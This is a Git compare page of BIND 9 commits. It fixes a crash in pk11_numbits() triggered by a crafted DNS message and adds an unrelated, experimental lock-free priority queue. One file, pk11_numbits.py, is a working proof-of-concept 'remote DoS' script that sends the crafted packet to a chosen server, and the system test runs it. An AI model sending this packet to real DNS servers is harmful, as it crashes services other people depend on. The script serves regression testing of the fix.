Compare commits

...

9 Commits

Author SHA1 Message Date
Ondřej Surý
87b137e740 Add the memory management method from Valois/Maged/Scott paper 2020-07-27 15:01:43 +02:00
Ondřej Surý
39d7ad5049 Add the memory management method from Valois/Maged/Scott paper 2020-07-27 08:37:40 +02:00
Ondřej Surý
c15fcc89d0 Add 2005 paper update 2020-07-26 16:06:32 +02:00
Ondřej Surý
d85ef1059f Add initial implementation of Sundell-Tsigas lock-less priority queue 2020-07-24 15:34:44 +02:00
Ondřej Surý
eec3d716ca Add missing isc/util.h header to isc/refcount.h 2020-07-24 15:34:28 +02:00
Ondřej Surý
f4739881d4 Don't strip the SOFTHSM2_CONF and SLOT environment variables when using ./run.sh 2020-07-21 21:14:13 +02:00
Ondřej Surý
490a811253 Add PoC system test for pk11_numbits() assertion 2020-07-21 21:14:13 +02:00
Ondřej Surý
cb7497583a Add CHANGES and release note for GL #2037 (FIXME: CHANGES number and submitters name missing) 2020-07-21 17:03:24 +02:00
Ondřej Surý
86ec661273 Fix crash in pk11_numbits() when native-pkcs11 is used
When pk11_numbits() is passed a user provided input that contains all
zeroes (via crafted DNS message), it would crash with assertion
failure.  Fix that by properly handling such output.
2020-07-21 17:03:24 +02:00
10 changed files with 786 additions and 36 deletions

View File

@@ -1,3 +1,8 @@
XXXX. [security] When compiled with native PKCS#11 support, it was
possible to trigger an INSIST when determining number of
bits in the PKCS#11 RSA public key with a specially
crafted packet. [GL #2037]
5473. [func] The rbt hashtable implementation has been changed
to use faster hash-function (HalfSipHash2-4) and
uses Fibonacci hashing for better distribution.

View File

@@ -0,0 +1,26 @@
#!/usr/bin/env python3
"""
BIND 9.16.5 remote DoS
pk11_numbits() assertion
"""
import sys
import socket
pkt = b"\x01\x37\xed\xda\x28\x00\x00\x01\x00\x00\x00\x01\x00\x00\x09\x72" \
+ b"\x73\x61\x73\x68\x61\x32\x35\x36\x07\x65\x78\x61\x6d\x70\x6c\x65" \
+ b"\x00\x00\x06\x00\x01" \
+ b"\xc0\x0c\x00\x30\x00\x01\x00\x00\x01\x2c\x01" \
+ b"\x08\x01\x00\x03\x08\x03\x01\x00\x01" \
+ b'\x00'*256
if len(sys.argv) < 3:
print('usage: %s server port' % sys.argv[0])
sys.exit()
IP = sys.argv[1]
PORT = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, PORT))
sock.sendall(pkt)
sock.close()

View File

@@ -137,5 +137,10 @@ echo_i "Checking if all supported algorithms were tested"
[ "$n" -eq "$(wc -l < supported)" ] || ret=1
test_done
if [ -n "$PYTHON" ]; then
echo_i "Checking for assertion failure in pk11_numbits()"
$PYTHON pk11_numbits.py 10.53.0.1 "$PORT"
fi
echo_i "exit status: $status"
[ "$status" -eq 0 ] || exit 1

View File

@@ -71,7 +71,7 @@ if ! $do_run; then
if [ "$baseport" -eq 0 ]; then
log_flags="$log_flags -p 5300"
fi
env - PATH="$PATH" ${LD_LIBRARY_PATH:+"LD_LIBRARY_PATH=${LD_LIBRARY_PATH}"} TESTS="$*" TEST_SUITE_LOG=run.log LOG_DRIVER_FLAGS="--verbose yes --color-tests yes" LOG_FLAGS="$log_flags" make -e check
env - SLOT="$SLOT" SOFTHSM2_CONF="$SOFTHSM2_CONF" PATH="$PATH" ${LD_LIBRARY_PATH:+"LD_LIBRARY_PATH=${LD_LIBRARY_PATH}"} TESTS="$*" TEST_SUITE_LOG=run.log LOG_DRIVER_FLAGS="--verbose yes --color-tests yes" LOG_FLAGS="$log_flags" make -e check
exit $?
fi

View File

@@ -14,7 +14,9 @@ Notes for BIND 9.17.4
Security Fixes
~~~~~~~~~~~~~~
- None.
- When compiled with native PKCS#11 support, it was possible to trigger an
INSIST when determining number of bits in the PKCS#11 RSA public key with a
specially crafted packet. [GL #2037]
Known Issues
~~~~~~~~~~~~

View File

@@ -292,6 +292,7 @@ pkcs11rsa_createctx_verify(dst_key_t *key, unsigned int maxbits,
key->key_alg == DST_ALG_NSEC3RSASHA1 ||
key->key_alg == DST_ALG_RSASHA256 ||
key->key_alg == DST_ALG_RSASHA512);
REQUIRE(maxbits <= RSA_MAX_PUBEXP_BITS);
/*
* Reject incorrect RSA key lengths.
@@ -334,6 +335,7 @@ pkcs11rsa_createctx_verify(dst_key_t *key, unsigned int maxbits,
for (attr = pk11_attribute_first(rsa); attr != NULL;
attr = pk11_attribute_next(rsa, attr))
{
switch (attr->type) {
case CKA_MODULUS:
INSIST(keyTemplate[5].type == attr->type);
@@ -350,13 +352,16 @@ pkcs11rsa_createctx_verify(dst_key_t *key, unsigned int maxbits,
memmove(keyTemplate[6].pValue, attr->pValue,
attr->ulValueLen);
keyTemplate[6].ulValueLen = attr->ulValueLen;
if (pk11_numbits(attr->pValue, attr->ulValueLen) >
maxbits &&
maxbits != 0) {
unsigned int bits;
ret = pk11_numbits(attr->pValue, attr->ulValueLen,
&bits);
if (ret != ISC_R_SUCCESS ||
(bits > maxbits && maxbits != 0)) {
DST_RET(DST_R_VERIFYFAILURE);
}
break;
}
}
pk11_ctx->object = CK_INVALID_HANDLE;
pk11_ctx->ontoken = false;
PK11_RET(pkcs_C_CreateObject,
@@ -957,14 +962,17 @@ pkcs11rsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
keyTemplate[5].ulValueLen = attr->ulValueLen;
break;
case CKA_PUBLIC_EXPONENT:
unsigned int bits;
INSIST(keyTemplate[6].type == attr->type);
keyTemplate[6].pValue = isc_mem_get(dctx->mctx,
attr->ulValueLen);
memmove(keyTemplate[6].pValue, attr->pValue,
attr->ulValueLen);
keyTemplate[6].ulValueLen = attr->ulValueLen;
if (pk11_numbits(attr->pValue, attr->ulValueLen) >
RSA_MAX_PUBEXP_BITS) {
ret = pk11_numbits(attr->pValue, attr->ulValueLen,
&bits);
if (ret != ISC_R_SUCCESS || bits > RSA_MAX_PUBEXP_BITS)
{
DST_RET(DST_R_VERIFYFAILURE);
}
break;
@@ -1335,6 +1343,8 @@ pkcs11rsa_fromdns(dst_key_t *key, isc_buffer_t *data) {
CK_BYTE *exponent = NULL, *modulus = NULL;
CK_ATTRIBUTE *attr;
unsigned int length;
unsigned int bits;
isc_result_t ret = ISC_R_SUCCESS;
isc_buffer_remainingregion(data, &r);
if (r.length == 0) {
@@ -1351,9 +1361,7 @@ pkcs11rsa_fromdns(dst_key_t *key, isc_buffer_t *data) {
if (e_bytes == 0) {
if (r.length < 2) {
isc_safe_memwipe(rsa, sizeof(*rsa));
isc_mem_put(key->mctx, rsa, sizeof(*rsa));
return (DST_R_INVALIDPUBLICKEY);
DST_RET(DST_R_INVALIDPUBLICKEY);
}
e_bytes = (*r.base) << 8;
isc_region_consume(&r, 1);
@@ -1362,16 +1370,18 @@ pkcs11rsa_fromdns(dst_key_t *key, isc_buffer_t *data) {
}
if (r.length < e_bytes) {
isc_safe_memwipe(rsa, sizeof(*rsa));
isc_mem_put(key->mctx, rsa, sizeof(*rsa));
return (DST_R_INVALIDPUBLICKEY);
DST_RET(DST_R_INVALIDPUBLICKEY);
}
exponent = r.base;
isc_region_consume(&r, e_bytes);
modulus = r.base;
mod_bytes = r.length;
key->key_size = pk11_numbits(modulus, mod_bytes);
ret = pk11_numbits(modulus, mod_bytes, &bits);
if (ret != ISC_R_SUCCESS) {
DST_RET(ISC_R_RANGE);
}
key->key_size = bits;
isc_buffer_forward(data, length);
@@ -1391,6 +1401,10 @@ pkcs11rsa_fromdns(dst_key_t *key, isc_buffer_t *data) {
key->keydata.pkey = rsa;
return (ISC_R_SUCCESS);
err:
isc_safe_memwipe(rsa, sizeof(*rsa));
isc_mem_put(key->mctx, rsa, sizeof(*rsa));
return (ret);
}
static isc_result_t
@@ -1564,6 +1578,7 @@ pkcs11rsa_fetch(dst_key_t *key, const char *engine, const char *label,
pk11_object_t *pubrsa;
pk11_context_t *pk11_ctx = NULL;
isc_result_t ret;
unsigned int bits;
if (label == NULL) {
return (DST_R_NOENGINE);
@@ -1642,7 +1657,11 @@ pkcs11rsa_fetch(dst_key_t *key, const char *engine, const char *label,
attr = pk11_attribute_bytype(rsa, CKA_MODULUS);
INSIST(attr != NULL);
key->key_size = pk11_numbits(attr->pValue, attr->ulValueLen);
ret = pk11_numbits(attr->pValue, attr->ulValueLen, &bits);
if (ret != ISC_R_SUCCESS) {
DST_RET(ISC_R_RANGE);
}
key->key_size = bits;
return (ISC_R_SUCCESS);
@@ -1734,6 +1753,7 @@ pkcs11rsa_parse(dst_key_t *key, isc_lex_t *lexer, dst_key_t *pub) {
CK_ATTRIBUTE *attr;
isc_mem_t *mctx = key->mctx;
const char *engine = NULL, *label = NULL;
unsigned int bits;
/* read private key file */
ret = dst__privstruct_parse(key, DST_ALG_RSA, lexer, mctx, &priv);
@@ -1871,12 +1891,17 @@ pkcs11rsa_parse(dst_key_t *key, isc_lex_t *lexer, dst_key_t *pub) {
attr = pk11_attribute_bytype(rsa, CKA_MODULUS);
INSIST(attr != NULL);
key->key_size = pk11_numbits(attr->pValue, attr->ulValueLen);
ret = pk11_numbits(attr->pValue, attr->ulValueLen, &bits);
if (ret != ISC_R_SUCCESS) {
DST_RET(ISC_R_RANGE);
}
key->key_size = bits;
attr = pk11_attribute_bytype(rsa, CKA_PUBLIC_EXPONENT);
INSIST(attr != NULL);
if (pk11_numbits(attr->pValue, attr->ulValueLen) > RSA_MAX_PUBEXP_BITS)
{
ret = pk11_numbits(attr->pValue, attr->ulValueLen, &bits);
if (ret != ISC_R_SUCCESS || bits > RSA_MAX_PUBEXP_BITS) {
DST_RET(ISC_R_RANGE);
}
@@ -1911,6 +1936,7 @@ pkcs11rsa_fromlabel(dst_key_t *key, const char *engine, const char *label,
pk11_context_t *pk11_ctx = NULL;
isc_result_t ret;
unsigned int i;
unsigned int bits;
UNUSED(pin);
@@ -1996,14 +2022,19 @@ pkcs11rsa_fromlabel(dst_key_t *key, const char *engine, const char *label,
attr = pk11_attribute_bytype(rsa, CKA_PUBLIC_EXPONENT);
INSIST(attr != NULL);
if (pk11_numbits(attr->pValue, attr->ulValueLen) > RSA_MAX_PUBEXP_BITS)
{
ret = pk11_numbits(attr->pValue, attr->ulValueLen, &bits);
if (ret != ISC_R_SUCCESS || bits > RSA_MAX_PUBEXP_BITS) {
DST_RET(ISC_R_RANGE);
}
attr = pk11_attribute_bytype(rsa, CKA_MODULUS);
INSIST(attr != NULL);
key->key_size = pk11_numbits(attr->pValue, attr->ulValueLen);
ret = pk11_numbits(attr->pValue, attr->ulValueLen, &bits);
if (ret != ISC_R_SUCCESS) {
goto err;
}
key->key_size = bits;
pk11_return_session(pk11_ctx);
isc_safe_memwipe(pk11_ctx, sizeof(*pk11_ctx));

View File

@@ -20,6 +20,7 @@
#include <isc/mutex.h>
#include <isc/platform.h>
#include <isc/types.h>
#include <isc/util.h>
/*! \file isc/refcount.h
* \brief Implements a locked reference counter.

View File

@@ -30,8 +30,8 @@ pk11_mem_put(void *ptr, size_t size);
CK_SLOT_ID
pk11_get_best_token(pk11_optype_t optype);
unsigned int
pk11_numbits(CK_BYTE_PTR data, unsigned int bytecnt);
isc_result_t
pk11_numbits(CK_BYTE_PTR data, unsigned int bytecnt, unsigned int *bits);
CK_ATTRIBUTE *
pk11_attribute_first(const pk11_object_t *obj);

View File

@@ -652,13 +652,14 @@ pk11_get_best_token(pk11_optype_t optype) {
return (token->slotid);
}
unsigned int
pk11_numbits(CK_BYTE_PTR data, unsigned int bytecnt) {
isc_result_t
pk11_numbits(CK_BYTE_PTR data, unsigned int bytecnt, unsigned int *bits) {
unsigned int bitcnt, i;
CK_BYTE top;
if (bytecnt == 0) {
return (0);
*bits = 0;
return (ISC_R_SUCCESS);
}
bitcnt = bytecnt * 8;
for (i = 0; i < bytecnt; i++) {
@@ -668,33 +669,40 @@ pk11_numbits(CK_BYTE_PTR data, unsigned int bytecnt) {
continue;
}
if (top & 0x80) {
return (bitcnt);
*bits = bitcnt;
return (ISC_R_SUCCESS);
}
if (top & 0x40) {
return (bitcnt - 1);
*bits = bitcnt - 1;
return (ISC_R_SUCCESS);
}
if (top & 0x20) {
return (bitcnt - 2);
*bits = bitcnt - 2;
return (ISC_R_SUCCESS);
}
if (top & 0x10) {
return (bitcnt - 3);
*bits = bitcnt - 3;
return (ISC_R_SUCCESS);
}
if (top & 0x08) {
return (bitcnt - 4);
*bits = bitcnt - 4;
return (ISC_R_SUCCESS);
}
if (top & 0x04) {
return (bitcnt - 5);
*bits = bitcnt - 5;
return (ISC_R_SUCCESS);
}
if (top & 0x02) {
return (bitcnt - 6);
*bits = bitcnt - 6;
return (ISC_R_SUCCESS);
}
if (top & 0x01) {
return (bitcnt - 7);
*bits = bitcnt - 7;
return (ISC_R_SUCCESS);
}
break;
}
INSIST(0);
ISC_UNREACHABLE();
return (ISC_R_RANGE);
}
CK_ATTRIBUTE *

672
lib/isc/pq.c Normal file
View File

@@ -0,0 +1,672 @@
#include <assert.h>
#include <inttypes.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <isc/atomic.h>
#include <isc/mem.h>
#include <isc/random.h>
#include <isc/refcount.h>
/* PUBLIC */
typedef struct isc_pq isc_pq_t;
bool
Insert(isc_pq_t *pq, uint32_t key, void *value);
void *
DeleteMin(isc_pq_t *pq);
/* PRIVATE */
#define MAXLEVEL 31 /* floor(log2(UINT32_MAX)) */
#define NODE_NEXT(node, level) ((node)->next[level])
#define NODE_PREV(node) ((node)->prev)
#define PQ_HEAD(pq) (node_t *)atomic_load(&(pq)->head)
#define PQ_TAIL(pq) (node_t *)atomic_load(&(pq)->tail)
#define COPY_HEAD(pq) copy_node(PQ_HEAD(pq))
#define GET_PREV(pq, prevp, level, key) { \
node_t *__tmp_node = ScanKey(pq, &prev, i, key); \
release_node(&__tmp_node); \
}
typedef struct node node_t;
struct isc_pq {
unsigned int magic;
isc_mem_t *mctx;
atomic_uintptr_t head;
atomic_uintptr_t tail;
uint32_t maxlevel;
bool unique;
};
struct node {
isc_pq_t *pq;
isc_refcount_t references;
uint32_t key;
uint32_t level;
atomic_uint_fast32_t valid;
atomic_uintptr_t value;
atomic_uintptr_t prev;
atomic_uintptr_t next[];
};
#undef isc_mem_create
#undef isc_mem_destroy
#undef isc_mem_get
#undef isc_mem_put
#undef isc_mem_attach
#undef isc_mem_putanddetach
#define isc_mem_create(mctxp) (void)mctxp;
#define isc_mem_attach(s, t)
#define isc_mem_putanddetach(m, p, s) free(p)
#define isc_mem_put(mctx, node, size) free(node)
#define isc_mem_get(mctx, size) calloc(1, size)
#define isc_mem_detach(mctx)
#define isc_mem_checkdestroyed(f)
node_t *
HelpDelete(isc_pq_t *pq, node_t *node, size_t level);
bool
DecrementAndTestAndSet(atomic_uint_fast32_t *ptr) {
uint_fast32_t new = 0;
uint_fast32_t old = atomic_load_acquire(ptr);
do {
new = old - 2;
if (new == 0) {
new = 1;
}
} while (!atomic_compare_exchange_weak_acq_rel(ptr, &old, new));
return (old - new) & 1;
}
void
ClearLowestBit(atomic_uint_fast32_t *ptr) {
uint_fast32_t new = 0;
uint_fast32_t old = atomic_load_acquire(ptr);
do {
new = old - 1;
} while (!atomic_compare_exchange_weak_acq_rel(ptr, &old, new));
}
static void
node_free(void *node0);
static bool
Release(node_t *ptr) {
if (ptr == NULL) {
return false;
}
if (DecrementAndTestAndSet(&ptr->references) == 0) {
return false;
}
node_free(ptr);
return true;
}
static void *
SafeRead(node_t **ptr) {
REQUIRE(*ptr != NULL);
for (;;) {
node_t *q = (node_t *)atomic_load((atomic_uintptr_t *)ptr);
uint32_t old = atomic_fetch_add_relaxed(&q->references, 2);
REQUIRE(old < UINT32_MAX);
if (q == *ptr) {
return q;
} else {
Release(q);
}
}
}
static void
node_free(void *node0) {
node_t *node = (node_t *)node0;
fprintf(stderr, "Destroying %p->references = %" PRIuFAST32 "\n", node, node->references);
/* isc_refcount_destroy(&node->references); */
/* node->references = UINT32_MAX; */
isc_mem_put(node->pq->mctx, node, sizeof(*node) + node->level * sizeof(node->next[0]));
}
static node_t *
node_new(isc_pq_t *pq, size_t level, uint32_t key, void *value) {
REQUIRE(level > 0);
REQUIRE(level <= pq->maxlevel);
node_t *node = isc_mem_get(pq->mctx, sizeof(*node) + level * sizeof(node->next[0]));
*node = (node_t){ .pq = pq,
.level = level,
.valid = 0,
.key = key };
atomic_init(&node->valid, 2);
atomic_init(&node->value, (uintptr_t)value);
isc_refcount_init(&node->references, 2);
for (size_t i = 0; i < level; i++) {
atomic_init(&node->next[i], (uintptr_t)0);
}
ClearLowestBit(&node->references);
/* Must be claimed */
assert((node->references & 0x01) == 0x01);
return (node);
}
#define NODE_MARK UINT64_C(0x01)
#define is_marked(node) ((((uintptr_t)node) & NODE_MARK) == NODE_MARK)
#define get_marked(node) (((uintptr_t)node) | NODE_MARK)
#define get_unmarked(node) (((uintptr_t)node) & ~NODE_MARK)
#define read_node(nodep) _read_node(nodep, __FILE__, __LINE__)
#define copy_node(node) _copy_node(node, __FILE__, __LINE__)
#define release_node(node) _release_node(node, __FILE__, __LINE__)
#define ReadNext(pq, nodep, level) _ReadNext(pq, nodep, level, __FILE__, __LINE__)
#define ScanKey(pq, nodep, level, key) _ScanKey(pq, nodep, level, key, __FILE__, __LINE__)
static node_t *
_read_node(node_t **nodep, char *file, unsigned int line) {
{
node_t *node = *nodep;
if (node == NULL || is_marked(node)) {
fprintf(stderr, "%s:%u:%u: read_node: %p\n", file, line, (unsigned int)pthread_self(), (node));
return NULL;
}
if (atomic_load(&node->references) > 100) {
fprintf(stderr, "%s:%u:%u: READ_NODE: %p->%" PRIxFAST32 "!!!!!!!!\n", file, line, (unsigned int)pthread_self(), node, node->references);
} else {
fprintf(stderr, "%s:%u:%u: read_node: %p->%" PRIxFAST32 "\n", file, line, (unsigned int)pthread_self(), node, node->references);
}
}
return SafeRead(nodep);
}
static node_t *
_copy_node(node_t *node, char *file, unsigned int line) {
REQUIRE(node != NULL);
fprintf(stderr, "%s:%u:%u: copy_node: %p->%" PRIxFAST32 "\n", file, line, (unsigned int)pthread_self(), (node), (node)->references);
REQUIRE(!is_marked(node));
isc_refcount_increment(&node->references);
return (node);
}
static void
_release_node(node_t **nodep, char *file, unsigned int line) {
{
REQUIRE(nodep != NULL && *nodep != NULL);
node_t *node = *nodep;
fprintf(stderr, "%s:%u:%u: rlse_node: %p->%" PRIxFAST32 "\n", file, line, (unsigned int)pthread_self(), (node), (node)->references); \
REQUIRE(!is_marked(node));
}
if (Release(*nodep)) {
*nodep = NULL;
}
}
static size_t
randomlevel(isc_pq_t *pq) {
REQUIRE(pq->maxlevel <= 32);
uint32_t r = isc_random32();
size_t level = 1;
r &= (1 << (pq->maxlevel - 1)) - 1;
while ((r & 1)) {
level++;
r >>= 1;
}
INSIST(level < pq->maxlevel);
return level;
}
static inline void
mark_next(node_t *node, size_t i) {
uintptr_t tmp = atomic_load(&NODE_NEXT(node, i));
while (!is_marked(tmp)) {
if (atomic_compare_exchange_weak(&NODE_NEXT(node, i),
&tmp,
get_marked(tmp)))
{
break;
}
}
}
static inline bool
mark_value(isc_pq_t *pq, node_t **nextp, node_t *prev, uintptr_t *valuep) {
/*
* Try to set this deletion mark using the CAS primitive, and if it
* succeeds it also writes a valid pointer to the prev field of the
* node.
*
* This prev field is necessary in order to increase the performance of
* concurrent HelpDelete operations, these operations otherwise would
* have to search for the previous node in order to complete the
* deletion.
*/
REQUIRE(nextp != NULL && *nextp != NULL);
node_t *node = *nextp;
uintptr_t value = atomic_load(&node->value);
for (;;) {
if (node != (node_t *)NODE_NEXT(prev, 0)) {
release_node(&node);
continue;
}
if (!is_marked(value)) {
if (atomic_compare_exchange_weak(&node->value, &value,
get_marked(value)))
{
atomic_store(&NODE_PREV(prev), (uintptr_t)prev);
*valuep = value;
return (true);
}
continue;
} else {
/*
* The value is already marked, look for the
* next item on the list
*/
*nextp = node = HelpDelete(pq, node, 0);
return (false);
}
}
}
static node_t *
_ReadNext(isc_pq_t *pq, node_t **prev, size_t level, char *file, unsigned int line) {
if (is_marked(atomic_load(&(*prev)->value))) {
*prev = HelpDelete(pq, *prev, level);
}
node_t *next = (node_t *)atomic_load(&NODE_NEXT(*prev, level));
node_t *node = _read_node(&next, file, line);
while (node == NULL) {
*prev = HelpDelete(pq, *prev, level);
next = (node_t *)atomic_load(&NODE_NEXT(*prev, level));
node = _read_node(&next, file, line);
}
return (node);
}
/*
* Returns next key, and puts prev key in *node1
*/
static node_t *
_ScanKey(isc_pq_t *pq, node_t **prev, size_t level, uint32_t key, char *file, unsigned int line) {
fprintf(stderr, "%s:%u:%u: ScanKey : %p, level = %zu, key = %u\n", file, line, (unsigned int)pthread_self(), *prev, level, key);
REQUIRE(!is_marked(*prev));
node_t *node = _ReadNext(pq, prev, level, file, line);
while (node->key < key) {
_release_node(prev, file, line);
*prev = node;
node = _ReadNext(pq, prev, level, file, line);
}
assert(node != PQ_HEAD(pq));
return (node);
}
#define return_if_done(node, level) \
if (atomic_load(&NODE_NEXT(node, level)) == NODE_MARK) { \
break; \
}
#if defined(ISC_PQ_EXPONENTIAL_BACKOFF)
thread_local int swap_next_backoff = 0;
#endif
static inline void
RemoveNode(isc_pq_t *pq, node_t **prevp, node_t *node, size_t level, char *file, unsigned int line) {
#if defined(ISC_PQ_EXPONENTIAL_BACKOFF)
swap_next_backoff = 2;
#endif
for (;;) {
node_t *prev = *prevp;
node_t *last;
fprintf(stderr, "%s:%u:%u: swap_next: node = %p, node->next[%zu] = %p, prev = %p, prev->next[%zu] = %p\n", file, line, (unsigned int)pthread_self(), node, level, (void *)(node->next[level]), prev, level, (void *)(prev->next[level]));
/* pq.c:484:2578360064: swap_next: node = 0x7f889c001d20, node->next[1] = 0x1, prev = 0x7f889c001d20, prev->next[1] = 0x1 */
return_if_done(node, level);
last = ScanKey(pq, prevp, level, node->key);
release_node(&last);
if (last != node) {
fprintf(stderr, "%s:%u:%u: swap_next: last = %p != node = %p\n", file, line, (unsigned int)pthread_self(), last, node);
return;
}
return_if_done(node, level);
if (atomic_compare_exchange_strong(
&NODE_NEXT(prev, level), (uintptr_t *)&node,
get_unmarked(
atomic_load(&NODE_NEXT(node, level)))))
{
atomic_store(&NODE_NEXT(node, level), NODE_MARK);
return;
}
return_if_done(node, level);
#if defined(ISC_PQ_EXPONENTIAL_BACKOFF)
usleep(swap_next_backoff);
if (swap_next_backoff * 2 < 1000000) {
swap_next_backoff *= 2;
}
#else
/* Back-Off */
sched_yield();
#endif
}
}
/* #undef return_if_done */
static inline void
insert_next(isc_pq_t *pq, node_t *newnode, size_t level, node_t *prev, uint32_t key) {
atomic_store(&newnode->valid, level);
for (;;) {
node_t *oldnode = ScanKey(pq, &prev, level, key);
atomic_store(&NODE_NEXT(newnode, level), (uintptr_t)oldnode);
release_node(&oldnode);
if (is_marked(newnode->value) ||
atomic_compare_exchange_strong(&NODE_NEXT(prev, level),
(uintptr_t *)&oldnode,
(uintptr_t)newnode))
{
release_node(&prev);
break;
}
/* Back-Off */
sched_yield();
}
}
bool
Insert(isc_pq_t *pq, uint32_t key, void *value) {
/* Requires aligned pointers */
REQUIRE(!is_marked((uintptr_t)value));
node_t *prev;
node_t *newNode;
node_t *savedNodes[pq->maxlevel];
size_t level = randomlevel(pq);
newNode = node_new(pq, level, key, value);
copy_node(newNode);
prev = COPY_HEAD(pq);
for (size_t i = pq->maxlevel - 1; i > 0; i--) {
GET_PREV(pq, &prev, i, key);
if (i < level) {
savedNodes[i] = copy_node(prev);
}
}
for (;;) {
node_t *node = ScanKey(pq, &prev, 0, key);
uintptr_t value2 = atomic_load(&node->value);
if (pq->unique && !is_marked(value2) && node->key == key) {
if (atomic_compare_exchange_strong(&node->value, &value2,
(uintptr_t)value)) {
release_node(&prev);
release_node(&node);
for (size_t i = 1; i < level; i++) {
release_node(&savedNodes[i]);
}
release_node(&newNode);
release_node(&newNode); /* Final Delete */
return true;
} else {
release_node(&node);
continue;
}
}
atomic_init(&NODE_NEXT(newNode, 0), (uintptr_t)node);
release_node(&node);
if (atomic_compare_exchange_strong(&NODE_NEXT(prev, 0),
(uintptr_t *)&node,
(uintptr_t)newNode))
{
release_node(&prev);
break;
}
/* Back-Off */
sched_yield();
}
for (size_t i = 1; i < level; i++) {
insert_next(pq, newNode, i, savedNodes[i], key);
}
atomic_store(&newNode->valid, level);
/* Node has been already deleted before insert has finished */
if (is_marked(newNode->value)) {
newNode = HelpDelete(pq, newNode, 0);
}
release_node(&newNode);
return true;
}
void
node_print(node_t *node, char *s, char *f, char *file, unsigned int line) {
for (size_t i = 0; i < node->level; i++) {
fprintf(stderr, "%s:%u:%u: %s: %s = %p, %s->next[%zu] = %p\n", file, line, (unsigned int)pthread_self(), f, s, node, s, i, (node_t *)node->next[i]);
}
}
void *
DeleteMin(isc_pq_t *pq) {
node_t *prev;
node_t *node;
void *value;
node_print(PQ_HEAD(pq), "head", "DeleteStr", __FILE__, __LINE__);
prev = COPY_HEAD(pq);
/*
* Find the first node in the list that does not have is deletion mark
* on the value set.
*/
for (;;) {
/* Find the next node */
node = ReadNext(pq, &prev, 0);
/* The next node is tail => the queue is empty */
if (node == PQ_TAIL(pq)) {
release_node(&prev);
release_node(&node);
return (NULL);
}
if (mark_value(pq, &node, prev, (uintptr_t *)&value)) {
break;
}
release_node(&prev);
prev = node;
}
node_print(prev, "prev", "DeleteStr", __FILE__, __LINE__);
/*
* The next step is to mark the deletion bits of the next pointers in
* the node, starting with the lowest level and goint upwards, using
* the CAS primitive in each step.
*/
for (size_t i = 0; i < node->level; i++) {
mark_next(node, i);
}
/*
* Afterwards it starts the actual deletion by changing the next
* pointers of the previous node, starting at the highest level and
* continuing downwards. The reason for doing the deletion in decreasing
* order of levels is that concurent search operations also start at the
* highest level and proceed downwards, in this way the cocurrent search
* operations will sooner avoid traversing this node. The procedure
* performed by the DeleteMin operation in order to change each next
* pointer of the previous node and then perform the CAS primitive until
* it succeeds.
*/
prev = COPY_HEAD(pq);
for (int i = node->level-1; i >= 0; i--) {
RemoveNode(pq, &prev, node, (size_t)i, __FILE__, __LINE__);
}
node_print(PQ_HEAD(pq), "head", "DeleteEnd", __FILE__, __LINE__);
node_print(prev, "prev", "DeleteEnd", __FILE__, __LINE__);
release_node(&prev);
release_node(&node);
release_node(&node); /* Delete Node */
return (void *)value;
}
node_t *
HelpDelete(isc_pq_t *pq, node_t *node, size_t level) {
/*
* The HelpDelete operation tries to fulfill the deeltion on the current
* level and returns when it is completed.
*/
REQUIRE(is_marked(node->value));
node_t *prev;
/*
* It starts with setting the deletion mark on all next pointers in
* case they have not been set.
*/
for (size_t i = level; i < node->level; i++) {
mark_next(node, i);
}
/*
* It checks if the node given in the prev field is valid for deletion
* on the current level, otherwise it searches for the correct node.
*/
prev = (node_t *)atomic_load(&NODE_PREV(node));
if (prev == NULL || level >= atomic_load(&prev->valid)) {
prev = COPY_HEAD(pq);
for (int i = pq->maxlevel - 1; i >= (int)level; i--) {
GET_PREV(pq, &prev, i, node->key);
}
} else {
copy_node(prev);
}
/*
* The actual deletion of this node on the current level. This operation
* might execute concurrently with the corresponding DeleteMin
* operation, and therefore both operations synchronize with each other
* in order to avoid executing sub-operations that have already been
* performed.
*/
RemoveNode(pq, &prev, node, level, __FILE__, __LINE__);
release_node(&node);
return prev;
}
uint64_t testdata[64] = { 0 };
static isc_refcount_t deletes = 0;
static isc_refcount_t inserts = 0;
static void *
insert_thread(void *arg) {
isc_pq_t *pq = (isc_pq_t *)arg;
for (size_t i = sizeof(testdata) / sizeof(testdata[0]); i > 0; i--) {
/* fprintf(stderr, "Insert[%zu]: %p\n", i, &testdata[i - 1]); */
Insert(pq, i, &testdata[i - 1]);
(void)atomic_fetch_add(&inserts, 1);
}
return NULL;
}
static void *
delete_thread(void *arg) {
isc_pq_t *pq = (isc_pq_t *)arg;
for (size_t i = sizeof(testdata) / sizeof(testdata[0]); i > 0; i--) {
(void)DeleteMin(pq);
(void)atomic_fetch_add(&deletes, 1);
/* fprintf(stderr, "Delete[%zu]: %p\n", i, ptr); */
}
return (NULL);
}
int
main(void) {
isc_pq_t *pq = NULL;
isc_mem_t *mctx = NULL;
isc_mem_create(&mctx);
pq = isc_mem_get(mctx, sizeof(*pq));
*pq = (isc_pq_t) {
.maxlevel = MAXLEVEL,
.unique = false,
};
isc_mem_attach(mctx, &pq->mctx);
node_t *head = node_new(pq, pq->maxlevel, 0, 0);
node_t *tail = node_new(pq, 1, UINT32_MAX, 0);
for (size_t i = 0; i < pq->maxlevel; i++) {
atomic_init(&NODE_NEXT(head, i),
(uintptr_t)copy_node(tail));
}
atomic_init(&head->valid, MAXLEVEL);
atomic_init(&tail->valid, 0);
atomic_init(&NODE_PREV(tail), (uintptr_t)copy_node(head));
atomic_init(&pq->head, (uintptr_t)copy_node(head));
atomic_init(&pq->tail, (uintptr_t)copy_node(tail));
fprintf(stderr, "Inserts = %" PRIuFAST32 ", Deletes = %" PRIuFAST32 "\n", atomic_load(&inserts), atomic_load(&deletes));
(void)insert_thread(pq);
size_t nthreads = 4;
pthread_t threads[nthreads];
for (size_t i = 0; i < nthreads; i++) {
if ((i % 2) == 0) {
pthread_create(&threads[i], NULL, insert_thread, pq);
} else {
pthread_create(&threads[i], NULL, delete_thread, pq);
}
}
for (size_t i = 0; i < nthreads; i++) {
pthread_join(threads[i], NULL);
}
fprintf(stderr, "Inserts = %" PRIuFAST32 ", Deletes = %" PRIuFAST32 "\n", atomic_load(&inserts), atomic_load(&deletes));
(void)delete_thread(pq);
fprintf(stderr, "Inserts = %" PRIuFAST32 ", Deletes = %" PRIuFAST32 "\n", atomic_load(&inserts), atomic_load(&deletes));
while (head) {
